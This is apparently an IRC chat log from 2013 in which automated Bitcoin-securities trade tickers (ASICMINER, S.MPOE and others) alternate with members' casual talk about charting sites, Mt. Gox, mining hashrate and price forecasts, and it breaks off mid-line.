[-] Jul 04 14:38:59 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [-] Jul 04 14:40:32 [BTCTC] [DMS.PURCHASE] 55 @ 0.049273 = 2.71 BTC [+] Jul 04 14:40:47 [BTCTC] [AMC-PT] 2286 @ 0.00235 = 5.3721 BTC [+] Jul 04 14:41:35 [HAVELOCK] [ASICM] 31 @ 0.04489999 = 1.3919 BTC [+] Jul 04 14:42:14 [BTCTC] [AMC-PT] 3 @ 0.0024 = 0.0072 BTC [+] Jul 04 14:42:22 [HAVELOCK] [VTX] 3 @ 0.55 = 1.65 BTC [-] Jul 04 14:42:38 [HAVELOCK] [VTX] 10 @ 0.5545 = 5.545 BTC [+] Jul 04 14:43:52 [HAVELOCK] [ASICM] 64 @ 0.045877 = 2.9361 BTC [+] Jul 04 14:44:23 [BTCTC] [S.MPOE-PT] 1 @ 0.000992 BTC [+] Jul 04 14:50:32 [BTCTC] [ASICMINER-PT] 2 @ 4.779889 = 9.5598 BTC [+] Jul 04 14:51:18 [BTCTC] [TAT.ASICMINER] 32 @ 0.0465 = 1.488 BTC [+] Jul 04 14:51:20 [BTCTC] [TAT.ASICMINER] 168 @ 0.046999 = 7.8958 BTC [+] Jul 04 14:51:43 [HAVELOCK] [SDICE] 66 @ 0.173201 = 11.4313 BTC [-] Jul 04 15:01:02 [BTCTC] [AMC-PT] 100 @ 0.002101 = 0.2101 BTC [-] Jul 04 15:01:04 [BTCTC] [AMC-PT] 100 @ 0.0021 = 0.21 BTC [-] Jul 04 15:02:11 [BTCTC] [AMC-PT] 105 @ 0.002018 = 0.2119 BTC [-] Jul 04 15:03:04 [HAVELOCK] [ASICM] 21 @ 0.045877 = 0.9634 BTC [+] Jul 04 15:03:05 [HAVELOCK] [ASICM] 10 @ 0.045878 = 0.4588 BTC [+] Jul 04 15:03:07 [HAVELOCK] [ASICM] 305 @ 0.04588 = 13.9934 BTC [+] Jul 04 15:03:07 [HAVELOCK] [ASICM] 100 @ 0.04589999 = 4.59 BTC [+] Jul 04 15:03:08 [HAVELOCK] [ASICM] 35 @ 0.04599 = 1.6097 BTC [+] Jul 04 15:03:09 [HAVELOCK] [ASICM] 79 @ 0.046 = 3.634 BTC [+] Jul 04 15:03:38 [BTCTC] [ASICMINER-PT] 1 @ 4.65 BTC [-] Jul 04 15:05:38 [HAVELOCK] [ASICM] 1 @ 0.045999 BTC [-] Jul 04 15:05:40 [BTCTC] [BASIC-MINING] 2 @ 0.1541 = 0.3082 BTC [-] Jul 04 15:05:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.046999 BTC [+] Jul 04 15:05:48 [HAVELOCK] [ASICM] 1 @ 0.04587699 BTC [-] Jul 04 15:05:49 [BTCTC] [BASIC-MINING] 5 @ 0.154 = 0.77 BTC [-] Jul 04 15:11:24 [HAVELOCK] [ASICM] 1 @ 0.045997 BTC [+] Jul 04 15:13:22 [BTCTC] [ASICMINER-PT] 1 @ 4.77 BTC [+] Jul 04 15:13:26 [BTCTC] [ASICMINER-PT] 2 @ 4.779889 = 9.5598 BTC [+] Jul 04 15:13:32 [BTCTC] [ASICMINER-PT] 4 @ 4.7799 = 19.1196 BTC [+] Jul 04 15:13:37 [BTCTC] [ASICMINER-PT] 1 @ 4.77999 BTC [+] Jul 04 15:15:13 [HAVELOCK] [ASICM] 6 @ 0.045999 = 0.276 BTC [+] Jul 04 15:15:22 [HAVELOCK] [ASICM] 21 @ 0.046 = 0.966 BTC [+] Jul 04 15:18:15 [HAVELOCK] [ASICM] 2 @ 0.046249 = 0.0925 BTC [+] Jul 04 15:18:16 [HAVELOCK] [ASICM] 100 @ 0.04625 = 4.625 BTC [+] Jul 04 15:20:31 [BTCTC] [TAT.ASICMINER] 4 @ 0.046999 = 0.188 BTC [+] Jul 04 15:20:42 [HAVELOCK] [ASICM] 1 @ 0.045004 BTC [-] Jul 04 15:21:21 [BTCTC] [TAT.ASICMINER] 88 @ 0.046999 = 4.1359 BTC [+] Jul 04 15:22:04 [HAVELOCK] [ASICM] 1 @ 0.046399 BTC [+] Jul 04 15:22:05 [HAVELOCK] [ASICM] 99 @ 0.0464 = 4.5936 BTC [+] Jul 04 15:22:54 [HAVELOCK] [ASICM] 1 @ 0.0464 BTC [+] Jul 04 15:25:19 [BTCTC] [S.DICE-PT] 20 @ 0.002358 = 0.0472 BTC [+] Jul 04 15:26:09 [BTCTC] [TAT.ASICMINER] 6 @ 0.045901 = 0.2754 BTC [-] Jul 04 15:31:18 [BTCTC] [TAT.ASICMINER] 4 @ 0.046799 = 0.1872 BTC [+] Jul 04 15:32:35 [HAVELOCK] [VTX] 1 @ 0.555 BTC [+] Jul 04 15:38:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.045932 = 0.4593 BTC [-] Jul 04 15:38:58 [BTCTC] [TAT.ASICMINER] 40 @ 0.045901 = 1.836 BTC [-] Jul 04 15:39:01 [BTCTC] [BFMINES] 2000 @ 0.004 = 8 BTC Jul 04 15:44:57 [BTCTC] [ASICMINER-PT] 1 @ 4.77 BTC [-] Jul 04 15:47:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.046799 = 0.0936 BTC [+] Jul 04 15:48:08 [BTCTC] [ASICMINER-PT] 1 @ 4.77 BTC [-] Jul 04 15:48:19 [BTCTC] [TAT.ASICMINER] 3 @ 0.0469 = 0.1407 BTC [+] Jul 04 15:48:34 [BTCTC] [BITVPS] 10 @ 0.002799 = 0.028 BTC [+] Jul 04 15:49:19 [BTCTC] [BTC-BOND] 5 @ 0.01 = 0.05 BTC [+] Jul 04 15:49:51 [HAVELOCK] [ASICM] 1 @ 0.046 BTC [-] Jul 04 15:51:28 [HAVELOCK] [SDICE] 10 @ 0.173201 = 1.732 BTC [-] Jul 04 15:52:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.046201 = 0.462 BTC [-] Jul 04 15:52:50 [HAVELOCK] [ASICM] 1 @ 0.04643 BTC [+] Jul 04 15:53:01 [HAVELOCK] [ASICM] 1 @ 0.04645 BTC [+] Jul 04 15:53:50 [HAVELOCK] [ASICM] 2 @ 0.04643 = 0.0929 BTC [-] Jul 04 15:56:20 [MPEX] [S.MPOE] 9800 @ 0.00077617 = 7.6065 BTC [-] Jul 04 15:56:22 [MPEX] [S.MPOE] 1765 @ 0.00077591 = 1.3695 BTC [-] Jul 04 16:02:05 [HAVELOCK] [ASICM] 2 @ 0.04645 = 0.0929 BTC [+] Jul 04 16:02:27 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004023 = 0.0402 BTC [-] Jul 04 16:02:28 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.004022 = 0.0201 BTC [-] Jul 04 16:02:29 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.00402 = 0.0603 BTC [-] Jul 04 16:02:31 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.004 = 0.4 BTC [-] Jul 04 16:02:32 [BTCTC] [TAT.VIRTUALMINE] 950 @ 0.004 = 3.8 BTC [-] Jul 04 16:06:39 [BTCTC] [TAT.ASICMINER] 27 @ 0.046301 = 1.2501 BTC [+] Jul 04 16:06:41 [BTCTC] [TAT.ASICMINER] 6 @ 0.0463 = 0.2778 BTC [-] Jul 04 16:06:43 [BTCTC] [TAT.ASICMINER] 14 @ 0.0462 = 0.6468 BTC [-] Jul 04 16:07:14 !ticker btctc bitvps Jul 04 16:07:17 [BTCT:BITVPS] 1D: 0.001513 / 0.00279 / 0.002998 (458 shares, 1.3 BTC), 7D: 0.00089 / 0.00127 / 0.0035 (16771 shares, 21.4 BTC), 30D: 0.00036 / 0.00096 / 0.0035 (56301 shares, 53.9 BTC) Jul 04 16:08:54 [BTCTC] [TAT.ASICMINER] 30 @ 0.0275 = 0.825 BTC [-] Jul 04 16:09:37 [HAVELOCK] [ASICM] 34 @ 0.04645 = 1.5793 BTC [+] Jul 04 16:09:50 [BTCTC] [TAT.ASICMINER] 16 @ 0.033 = 0.528 BTC [+] Jul 04 16:10:12 [BTCTC] [TAT.ASICMINER] 8 @ 0.047399 = 0.3792 BTC [+] Jul 04 16:10:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.033 BTC [-] Jul 04 16:13:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.047399 BTC [+] Jul 04 16:14:03 [MPEX] [S.MPOE] 1396 @ 0.00077704 = 1.0847 BTC [+] Jul 04 16:14:05 [MPEX] [S.MPOE] 1104 @ 0.00077786 = 0.8588 BTC [+] Jul 04 16:15:10 [BTCTC] [ASICMINER-PT] 1 @ 4.72 BTC [-] Jul 04 16:15:16 [BTCTC] [ASICMINER-PT] 1 @ 4.710002 BTC [-] Jul 04 16:15:46 [BTCTC] [ASICMINER-PT] 1 @ 4.710002 BTC [-] Jul 04 16:16:03 [MPEX] [S.MPOE] 4546 @ 0.00077786 = 3.5362 BTC [+] Jul 04 16:16:05 [HAVELOCK] [ASICM] 63 @ 0.04645 = 2.9264 BTC [+] Jul 04 16:16:06 [HAVELOCK] [ASICM] 100 @ 0.04648 = 4.648 BTC [+] Jul 04 16:16:06 [HAVELOCK] [ASICM] 130 @ 0.04649 = 6.0437 BTC [+] Jul 04 16:16:07 [HAVELOCK] [ASICM] 8 @ 0.0465 = 0.372 BTC [+] Jul 04 16:18:01 [HAVELOCK] [ASICM] 13 @ 0.0465 = 0.6045 BTC [+] Jul 04 16:18:09 [HAVELOCK] [ASICM] 79 @ 0.0465 = 3.6735 BTC [+] Jul 04 16:18:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.047398 BTC [-] Jul 04 16:20:16 [BTCTC] [B.YABMC] 4 @ 0.006397 = 0.0256 BTC [+] Jul 04 16:20:27 [BTCTC] [DMS.PURCHASE] 15 @ 0.049273 = 0.7391 BTC [+] Jul 04 16:20:59 [BTCTC] [DMS.PURCHASE] 4 @ 0.049273 = 0.1971 BTC [+] Jul 04 16:21:02 [BTCTC] [DMS.MINING] 59 @ 0.02 = 1.18 BTC [-] Jul 04 16:22:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.046202 BTC [-] Jul 04 16:23:54 [HAVELOCK] [ASICM] 95 @ 0.045903 = 4.3608 BTC [-] Jul 04 16:26:45 [MPEX] [S.MPOE] 4104 @ 0.00077786 = 3.1923 BTC [+] Jul 04 16:26:46 [MPEX] [S.MPOE] 1846 @ 0.00077591 = 1.4323 BTC [-] Jul 04 16:28:10 [BTCTC] [B.YABMC] 20 @ 0.006398 = 0.128 BTC [+] Jul 04 16:29:12 [HAVELOCK] [ASICM] 2 @ 0.0467 = 0.0934 BTC [+] Jul 04 16:30:10 [HAVELOCK] [ASICM] 2 @ 0.0467 = 0.0934 BTC [+] Jul 04 16:30:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.047395 = 0.0948 BTC [+] Jul 04 16:32:08 [HAVELOCK] [ASICM] 5 @ 0.045902 = 0.2295 BTC [-] Jul 04 16:33:08 [HAVELOCK] [ASICM] 2 @ 0.04580001 = 0.0916 BTC [-] Jul 04 16:33:35 [HAVELOCK] [ASICM] 2 @ 0.04689998 = 0.0938 BTC [+] Jul 04 16:35:22 [BTCTC] [ASICMINER-PT] 1 @ 4.601251 BTC [-] Jul 04 16:35:27 [BTCTC] [ASICMINER-PT] 6 @ 4.601 = 27.606 BTC [-] Jul 04 16:37:51 [BTCTC] [TAT.ASICMINER] 23 @ 0.0469 = 1.0787 BTC [-] Jul 04 16:37:53 [BTCTC] [TAT.ASICMINER] 40 @ 0.046202 = 1.8481 BTC [-] Jul 04 16:37:54 [BTCTC] [TAT.ASICMINER] 250 @ 0.0451 = 11.275 BTC [-] Jul 04 16:43:03 [MPEX] [S.MPOE] 4900 @ 0.00077591 = 3.802 BTC [-] Jul 04 16:43:36 ;;ticker Jul 04 16:43:37 MtGox BTCUSD ticker | Best bid: 79.03200, Best ask: 79.03990, Bid-ask spread: 0.00790, Last trade: 79.03100, 24 hour volume: 109684.30615342, 24 hour low: 72.00000, 24 hour high: 86.26000, 24 hour vwap: 79.66696 Jul 04 16:43:48 It's George Orwell's birthday, and USA Independence Day Jul 04 16:44:28 I think this year I'll be celebrating George Orwell's birthday Jul 04 16:47:09 [HAVELOCK] [ASICM] 1 @ 0.04689998 BTC [+] Jul 04 16:47:09 [HAVELOCK] [ASICM] 1 @ 0.04689999 BTC [+] Jul 04 16:47:13 [BTCTC] [ASICMINER-PT] 3 @ 4.601 = 13.803 BTC [-] Jul 04 16:48:38 [HAVELOCK] [ASICM] 2 @ 0.04689998 = 0.0938 BTC [-] Jul 04 16:48:39 [HAVELOCK] [ASICM] 19 @ 0.04689999 = 0.8911 BTC [+] Jul 04 16:50:12 time for some Jay Z Jul 04 16:50:16 [BTCTC] [TAT.ASICMINER] 3 @ 0.046989 = 0.141 BTC [+] Jul 04 16:50:26 @parseval: How... appropriate Jul 04 16:50:32 [HAVELOCK] [ASICM] 2 @ 0.04689999 = 0.0938 BTC [+] Jul 04 16:51:49 BTCT did 10k btc volume yesterday Jul 04 16:52:30 Over 8900 of that was AM Jul 04 16:52:35 of course Jul 04 16:52:53 AM is paying everyone's bills these days Jul 04 16:53:16 [BTCTC] [TAT.ASICMINER] 3 @ 0.0451 = 0.1353 BTC [-] Jul 04 16:53:18 [BTCTC] [TAT.ASICMINER] 10 @ 0.045 = 0.45 BTC [-] Jul 04 16:53:20 Such a nice spread last night too Jul 04 16:53:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.045 BTC [-] Jul 04 16:53:22 [BTCTC] [TAT.ASICMINER] 20 @ 0.045 = 0.9 BTC [-] Jul 04 16:53:22 [BTCTC] [TAT.ASICMINER] 154 @ 0.0444 = 6.8376 BTC [-] Jul 04 16:53:31 i did pretty well :) Jul 04 16:54:19 If I had put all my 7000 USD of Bitcoins I bought last year in ASICMINER, I'd be getting like 10000-20000 USD weekly (depending on BTC/USD fluctuations and dividends fluctuations) Jul 04 16:54:25 Did you see, I have pie charts now, TAT Jul 04 16:54:54 i did :) Jul 04 16:54:59 site is coming along nicely Jul 04 16:55:09 i also see my sponsorship is gone ;) Jul 04 16:55:42 Pie charts/ Jul 04 16:55:44 ? Jul 04 16:55:46 Thanks. Oh, right... it was past the month, and I was redesigning so I left it out.. I'm still debating whether I want to try hitting you up for more btc ;) Jul 04 16:56:03 you know where to find me Jul 04 16:56:18 Namworld: http://coinflow.co/chart/ASICMINER-PT Jul 04 16:56:27 Cool, thanks :) Jul 04 16:56:41 The people over at Dragon's Tale might set up a PPC deal with me Jul 04 16:56:59 [MPEX] [S.MPOE] 8650 @ 0.00077827 = 6.732 BTC [+] Jul 04 16:57:34 pay per click Jul 04 16:57:40 i'm familiar ;) Jul 04 16:57:52 my company does some adwords mgmt for clients Jul 04 16:57:53 Oh, right Jul 04 16:58:23 i was wondering if ads are appropriate in your case Jul 04 16:58:25 Fancy stuff. Jul 04 16:58:39 or if monetizing the service is the angle Jul 04 16:58:48 [HAVELOCK] [ASICM] 2 @ 0.0468 = 0.0936 BTC [-] Jul 04 16:58:48 I was thinking that too Jul 04 16:58:50 I got a self-updating portfolio. But nothing too fancy. Jul 04 16:59:23 I was thinking I'd leave it ad-free until I can start adding other stuff like escrow services or whatever Jul 04 16:59:43 https://docs.google.com/spreadsheet/pub?key=0AvwwyRGyc1WgdGFKVlAtZVAzOGNqS1Brd05MUlFlT2c Jul 04 16:59:45 Namworld's Portfolio Jul 04 16:59:50 free for now is best, Jul 04 16:59:53 get the userbase Jul 04 16:59:58 become the authority Jul 04 16:59:59 Oh, I like that Jul 04 17:00:02 then stick it to em Jul 04 17:00:06 :) Jul 04 17:00:11 [HAVELOCK] [ASICM] 48 @ 0.0468 = 2.2464 BTC [-] Jul 04 17:00:14 if you become the authority, Jul 04 17:00:21 you could even charge BTCT for use Jul 04 17:00:22 etc Jul 04 17:00:35 make partnership deals Jul 04 17:00:43 Shameless insert of said tools: https://bitcointalk.org/index.php?topic=140427.0 Jul 04 17:00:46 add things like Weex support or whatever Jul 04 17:01:03 [HAVELOCK] [ASICM] 2 @ 0.04689999 = 0.0938 BTC [+] Jul 04 17:01:03 Nam, you should make the spreadsheets not inverted colors Jul 04 17:01:06 Namworld: That's pretty nice Jul 04 17:01:06 it hurts my eyes Jul 04 17:01:26 I'd be happy with getting early API access at this point :) Jul 04 17:01:41 Inverted colors? eh? Jul 04 17:01:45 white borders Jul 04 17:01:47 dark cells Jul 04 17:02:28 oh... meh Jul 04 17:02:54 You can choose whatever colors you want and what data/calcs to make if you make one =P Jul 04 17:03:10 indeed Jul 04 17:03:18 The tools are just to retrieve the data through the various APIs and insert it in Google Docs so eh =/ Jul 04 17:03:18 great selling point Jul 04 17:03:20 hehe Jul 04 17:04:01 Those headers are the darkest colors available, short of black, on Google Spreadsheets Jul 04 17:04:51 Didn't find the light color too annoying. It's not like most backgrounds on the web around light colored with dark text. Jul 04 17:05:24 just a suggestion Jul 04 17:05:41 numbers people won't care Jul 04 17:05:45 but... bitcoin Jul 04 17:09:14 [BTCTC] [TAT.ASICMINER] 45 @ 0.046987 = 2.1144 BTC [+] Jul 04 17:10:55 [BTCTC] [DMS.PURCHASE] 24 @ 0.049273 = 1.1826 BTC [+] Jul 04 17:12:16 dunno Jul 04 17:12:25 i know they re-enabled $ withdrawals Jul 04 17:15:10 [MPEX] [S.MPOE] 3050 @ 0.00077827 = 2.3737 BTC [+] Jul 04 17:15:12 [MPEX] [S.MPOE] 5500 @ 0.00077829 = 4.2806 BTC [+] Jul 04 17:17:15 [BTCTC] [DMS.SELLING] 50 @ 0.0294 = 1.47 BTC [+] Jul 04 17:18:10 [HAVELOCK] [ASICM] 76 @ 0.04689999 = 3.5644 BTC [+] Jul 04 17:19:44 [BTCTC] [TAT.ASICMINER] 3 @ 0.046987 = 0.141 BTC [+] Jul 04 17:19:46 still, it's better to wait and see if they are really clearing the backlog Jul 04 17:20:11 if one wants to consider mtgox at all Jul 04 17:20:23 [BTCTC] [BASIC-MINING] 3 @ 0.163999 = 0.492 BTC [+] Jul 04 17:20:26 i know i wouldnt Jul 04 17:20:41 havent used them in mos Jul 04 17:23:07 o/ Jul 04 17:24:56 [HAVELOCK] [ASICM] 8 @ 0.0471 = 0.3768 BTC [+] Jul 04 17:29:27 [HAVELOCK] [ASICM] 52 @ 0.046117 = 2.3981 BTC [-] Jul 04 17:29:28 [HAVELOCK] [ASICM] 2 @ 0.046116 = 0.0922 BTC [-] Jul 04 17:29:30 [HAVELOCK] [ASICM] 141 @ 0.046116 = 6.5024 BTC [-] Jul 04 17:32:29 [HAVELOCK] [ASICM] 2 @ 0.04708789 = 0.0942 BTC [+] Jul 04 17:33:07 [BTCTC] [ASICMINER-PT] 1 @ 4.602003 BTC [+] Jul 04 17:33:29 [HAVELOCK] [ASICM] 17 @ 0.047097 = 0.8006 BTC [+] Jul 04 17:33:55 [HAVELOCK] [ASICM] 127 @ 0.047096 = 5.9812 BTC [-] Jul 04 17:34:17 [HAVELOCK] [ASICM] 2 @ 0.04601101 = 0.092 BTC [-] Jul 04 17:34:21 [HAVELOCK] [ASICM] 43 @ 0.0470959 = 2.0251 BTC [+] Jul 04 17:34:41 [HAVELOCK] [ASICM] 2 @ 0.04709489 = 0.0942 BTC [-] Jul 04 17:35:15 [HAVELOCK] [ASICM] 43 @ 0.047098 = 2.0252 BTC [+] Jul 04 17:35:30 [HAVELOCK] [ASICM] 15 @ 0.047097 = 0.7065 BTC [-] Jul 04 17:35:31 [HAVELOCK] [ASICM] 40 @ 0.0470979 = 1.8839 BTC [+] Jul 04 17:35:33 [HAVELOCK] [ASICM] 238 @ 0.047099 = 11.2096 BTC [+] Jul 04 17:36:14 [HAVELOCK] [ASICM] 40 @ 0.047098 = 1.8839 BTC [-] Jul 04 17:36:16 [HAVELOCK] [ASICM] 15 @ 0.047099 = 0.7065 BTC [+] Jul 04 17:36:23 [HAVELOCK] [ASICM] 1 @ 0.047085 BTC [-] Jul 04 17:36:37 [HAVELOCK] [ASICM] 40 @ 0.047099 = 1.884 BTC [+] Jul 04 17:36:53 [HAVELOCK] [ASICM] 18 @ 0.0471 = 0.8478 BTC [+] Jul 04 17:36:54 [HAVELOCK] [ASICM] 1 @ 0.047085 BTC [-] Jul 04 17:37:00 [HAVELOCK] [ASICM] 4 @ 0.0470989 = 0.1884 BTC [+] Jul 04 17:37:09 [HAVELOCK] [ASICM] 50 @ 0.047214 = 2.3607 BTC [+] Jul 04 17:37:19 [HAVELOCK] [ASICM] 12 @ 0.047214 = 0.5666 BTC [+] Jul 04 17:37:35 [HAVELOCK] [ASICM] 2 @ 0.0472139 = 0.0944 BTC [-] Jul 04 17:39:28 [BTCTC] [TAT.ASICMINER] 31 @ 0.046799 = 1.4508 BTC [-] Jul 04 17:39:54 [BTCTC] [TAT.ASICMINER] 15 @ 0.0468 = 0.702 BTC [+] Jul 04 17:44:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.046988 BTC [+] Jul 04 17:45:09 [HAVELOCK] [ASICM] 2 @ 0.0460202 = 0.092 BTC [-] Jul 04 17:47:42 [BTCTC] [B.YABMC] 2 @ 0.0064 = 0.0128 BTC [+] Jul 04 17:47:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.046988 = 0.4699 BTC [+] Jul 04 17:48:12 [HAVELOCK] [ASICM] 4 @ 0.04600601 = 0.184 BTC [-] Jul 04 17:49:17 [HAVELOCK] [ASICM] 1 @ 0.04600601 BTC [-] Jul 04 17:50:30 [BTCTC] [AMC-PT] 105 @ 0.00221 = 0.2321 BTC [+] Jul 04 17:50:32 [BTCTC] [AMC-PT] 100 @ 0.0022 = 0.22 BTC [-] Jul 04 17:51:24 [HAVELOCK] [ASICM] 1 @ 0.045905 BTC [-] Jul 04 17:51:26 [HAVELOCK] [ASICM] 19 @ 0.045903 = 0.8722 BTC [-] Jul 04 17:52:17 [HAVELOCK] [ASICM] 2 @ 0.047378 = 0.0948 BTC [+] Jul 04 17:53:44 [HAVELOCK] [ASICM] 3 @ 0.046 = 0.138 BTC [-] Jul 04 17:54:39 [BTCTC] [ASICMINER-PT] 1 @ 4.601002 BTC [-] Jul 04 17:55:35 [BTCTC] [DMS.SELLING] 20 @ 0.029001 = 0.58 BTC [-] Jul 04 17:56:12 [HAVELOCK] [ASICM] 2 @ 0.046 = 0.092 BTC [-] Jul 04 17:56:30 [HAVELOCK] [ASICM] 1 @ 0.046 BTC [-] Jul 04 17:57:43 [HAVELOCK] [ASICM] 23 @ 0.046 = 1.058 BTC [-] Jul 04 17:59:15 [BTCTC] [S.DICE-PT] 1 @ 0.00238 BTC [+] Jul 04 17:59:53 [BTCTC] [BFMINES] 2 @ 0.004 = 0.008 BTC Jul 04 18:02:13 [HAVELOCK] [ASICM] 9 @ 0.046 = 0.414 BTC [-] Jul 04 18:02:41 [BTCTC] [TAT.ASICMINER] 4 @ 0.045601 = 0.1824 BTC [-] Jul 04 18:04:08 [HAVELOCK] [ASICM] 2 @ 0.0458 = 0.0916 BTC [-] Jul 04 18:04:13 [BTCTC] [GSDPT] 2 @ 0.00235 = 0.0047 BTC [-] Jul 04 18:05:58 [BTCTC] [AMC-PT] 10 @ 0.002299 = 0.023 BTC [+] Jul 04 18:06:26 so, how low bitcoin is going to fall? :) Jul 04 18:06:51 65 Jul 04 18:07:14 if it breaks that, then uhhhh Jul 04 18:07:22 40? Jul 04 18:07:33 [BTCTC] [BFMINES] 225 @ 0.004 = 0.9 BTC Jul 04 18:08:24 speculators seem intent on recreating a pattern Jul 04 18:08:30 hard to stop them Jul 04 18:11:04 self fulfilled prophecy Jul 04 18:11:19 they have nothing better to do Jul 04 18:11:19 [HAVELOCK] [ASICM] 28 @ 0.046999 = 1.316 BTC [+] Jul 04 18:11:21 no volume Jul 04 18:11:55 new blood is needed Jul 04 18:12:31 coinflow.co now has charts for Bitfunder, MPEX, and Havelock Jul 04 18:12:37 that's really the only thing that can stop the decline, that or massive resilient hoarding Jul 04 18:12:39 [BTCTC] [B.YABMC] 1 @ 0.0064 BTC [+] Jul 04 18:12:55 sweet! Jul 04 18:13:02 [BTCTC] [ASICMINER-PT] 1 @ 4.64 BTC [+] Jul 04 18:13:04 I need moar data though Jul 04 18:13:14 I lost those logs you sent me, TAT Jul 04 18:13:31 So it only has a few days worth of data Jul 04 18:13:37 :( Jul 04 18:13:45 I know, I was dumb Jul 04 18:13:58 But if you could resend.... :D Jul 04 18:14:05 plz email me Jul 04 18:14:08 to do it later Jul 04 18:14:08 [HAVELOCK] [ASICM] 3 @ 0.046999 = 0.141 BTC [+] Jul 04 18:14:10 [HAVELOCK] [ASICM] 3 @ 0.047 = 0.141 BTC [+] Jul 04 18:14:11 [HAVELOCK] [ASICM] 6 @ 0.047 = 0.282 BTC [+] Jul 04 18:14:13 Sure Jul 04 18:14:15 [BTCTC] [CRYPTO-TRADE] 8 @ 0.199998 = 1.6 BTC [+] Jul 04 18:16:19 [BTCTC] [AMC-PT] 68 @ 0.002299 = 0.1563 BTC [+] Jul 04 18:17:45 [HAVELOCK] [ASICM] 7 @ 0.047489 = 0.3324 BTC [+] Jul 04 18:23:56 [BTCTC] [COGNITIVE] 1 @ 0.32221 BTC [-] Jul 04 18:24:28 [BTCTC] [BASIC-MINING] 3 @ 0.15505 = 0.4652 BTC [-] Jul 04 18:25:38 [BTCTC] [TAT.ASICMINER] 8 @ 0.0462 = 0.3696 BTC [+] Jul 04 18:25:46 [BTCTC] [AMC-PT] 18 @ 0.002299 = 0.0414 BTC [+] Jul 04 18:28:26 [HAVELOCK] [ASICM] 1 @ 0.047486 BTC [-] Jul 04 18:32:15 Why is BFMines not listed on coinflow? Jul 04 18:32:16 [HAVELOCK] [ASICM] 1 @ 0.0473 BTC [-] Jul 04 18:34:09 [BTCTC] [ASICMINER-PT] 1 @ 4.65 BTC [+] Jul 04 18:34:11 [HAVELOCK] [ASICM] 2 @ 0.045302 = 0.0906 BTC [-] Jul 04 18:37:13 [BTCTC] [TAT.ASICMINER] 4 @ 0.045641 = 0.1826 BTC [-] Jul 04 18:37:15 [BTCTC] [TAT.ASICMINER] 10 @ 0.04564 = 0.4564 BTC [-] Jul 04 18:38:42 he probly needs to add each asset manually Jul 04 18:48:17 [BTCTC] [ASICMINER-PT] 1 @ 4.61 BTC [-] Jul 04 18:49:08 [HAVELOCK] [ASICM] 1 @ 0.0452 BTC [-] Jul 04 18:49:16 [HAVELOCK] [ASICM] 2 @ 0.047482 = 0.095 BTC [+] Jul 04 18:51:16 [HAVELOCK] [ASICM] 7 @ 0.04745 = 0.3322 BTC [-] Jul 04 18:51:18 [HAVELOCK] [ASICM] 11 @ 0.047477 = 0.5222 BTC [+] Jul 04 18:51:19 [HAVELOCK] [ASICM] 32 @ 0.047478 = 1.5193 BTC [+] Jul 04 18:52:10 [BTCTC] [ASICMINER-PT] 1 @ 4.602 BTC [-] Jul 04 18:53:21 [HAVELOCK] [ASICM] 24 @ 0.047482 = 1.1396 BTC [+] Jul 04 18:53:32 [BTCTC] [TAT.ASICMINER] 24 @ 0.0462 = 1.1088 BTC [+] Jul 04 18:56:45 [BTCTC] [AMC-PT] 15 @ 0.002175 = 0.0326 BTC [-] Jul 04 19:00:41 [HAVELOCK] [ASICM] 4 @ 0.047489 = 0.19 BTC [+] Jul 04 19:01:21 [HAVELOCK] [ASICM] 1 @ 0.047489 BTC [+] Jul 04 19:02:00 [BTCTC] [TAT.ASICMINER] 35 @ 0.0462 = 1.617 BTC [+] Jul 04 19:03:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0462 BTC [+] Jul 04 19:06:53 random observation, AM farm hashing temporarily declines significantly on Monday for the past 3 weeks Jul 04 19:07:02 ;;nethash Jul 04 19:07:04 175663.636948 Jul 04 19:07:10 ;;bcstats Jul 04 19:07:14 Current Blocks: 244764 | Current Difficulty: 2.1335329113983E7 | Next Difficulty At Block: 245951 | Next Difficulty In: 1187 blocks | Next Difficulty In About: 6 days, 21 hours, 37 minutes, and 40 seconds | Next Difficulty Estimate: 24235564.4094 | Estimated Percent Change: 13.59358 Jul 04 19:11:45 [HAVELOCK] [ASICM] 200 @ 0.04542 = 9.084 BTC [-] Jul 04 19:11:47 [BTCTC] [DMS.PURCHASE] 400 @ 0.049263 = 19.7052 BTC [-] Jul 04 19:16:08 Hashrate dropping again? Jul 04 19:16:41 When I wrote my article last night, AM was at ~30THs Jul 04 19:17:23 isn't the publicly known AM hashrate just a guess based on luck ? Jul 04 19:18:16 It's reverse calculated by looking at the blocks they solve, not the actual hashrate, so yes, to some extent. I wouldn't call it guess but it is based on luck. Jul 04 19:18:26 You're not unlucky just one day of the week, though. Jul 04 19:18:27 [BTCTC] [AMC-PT] 1 @ 0.002298 BTC [+] Jul 04 19:18:38 At least not consistently and predictably. Jul 04 19:18:45 i do think they pulled some blades offline Jul 04 19:19:03 http://www.asicminercharts.com/ Jul 04 19:19:05 Asicminer Hashrate Charts Jul 04 19:19:46 they were averaging 35TH+ for a while Jul 04 19:20:07 luck is a factor sure Jul 04 19:20:17 but they are as big as any mining pool Jul 04 19:22:18 Well, to be nice to them, I used their purchased 62TH when calculating. With the 30TH, it would look very bad. Jul 04 19:22:24 [BTCTC] [S.DICE-PT] 300 @ 0.002438 = 0.7314 BTC [+] Jul 04 19:22:58 With the halving effect, AM is losing money for investors every week. With 30TH they wouldn't even beat NASDAQ composite. Jul 04 19:23:02 omg Jul 04 19:23:09 [BTCTC] [TAT.ASICMINER] 6 @ 0.0462 = 0.2772 BTC [+] Jul 04 19:23:20 can you just never say halving effect again plz Jul 04 19:23:42 or at least wai til it's 1 yr away Jul 04 19:23:50 Can't comply, sorry. Whether you acknowledge it or not, it still exists and affects pricing today. Jul 04 19:23:59 [BTCTC] [S.DICE-PT] 820 @ 0.00243 = 